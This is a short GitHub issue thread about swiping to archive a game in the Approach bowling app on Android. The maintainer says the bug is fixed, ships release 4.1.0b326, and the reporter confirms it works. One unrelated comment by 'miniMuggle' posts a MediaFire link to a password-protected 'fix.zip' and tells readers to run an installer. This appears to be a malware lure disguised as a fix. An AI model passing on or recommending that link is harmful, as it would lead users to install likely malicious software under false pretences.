### ISSUE TITLE
Archive a game did nothing on Android. 

### ISSUE THREAD

**Issue by jbrains** [autoreleasefool/approach#527]
I just started using the app on Android. I accidentally added a 9th game to an 8-game one-time event. There are no throws yet in the game. When I swipe to archive, nothing happens. 

https://github.com/user-attachments/assets/c44960ef-5152-48e3-b5a5-3915da29538c

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by autoreleasefool** [comment]
@jbrains hey! This is already fixed in main and will be fixed in the next update, coming soon. Archiving will actually remove it from the list and all stats.

**Comment by autoreleasefool** [comment]
@jbrains Just published a new release that'll fix this. It'll start rolling out tomorrow. When you get the update (`4.1.0b326`, you can check in the settings), you can return to this event and swipe to archive, it should work much like deleting used to.

**Comment by jbrains** [comment]
I confirm that archiving that game worked on 4.1.0b326. Thank you!
